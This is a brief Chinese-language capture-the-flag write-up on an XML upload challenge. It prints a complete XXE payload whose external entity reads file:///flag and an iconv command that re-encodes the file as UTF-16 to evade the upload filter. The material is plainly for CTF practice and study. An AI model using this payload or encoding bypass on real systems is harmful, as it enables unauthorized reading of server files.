进入页面后看到一个Upload
看到给出的提示是让我们上传一个XML文件,刚好今天做了一个关于XML的XXE漏洞的题,底下贴链接,漏洞点为
给出提示flag在/flag中,所以构造出的payload为
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>bob@fakesite.com</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
直接上传发现给出提示
所以这里我们要通过XXE编码转换成utf-16编码绕过
iconv -f utf8 -t utf-16 t1.xml>t2.xml
成功拿到flag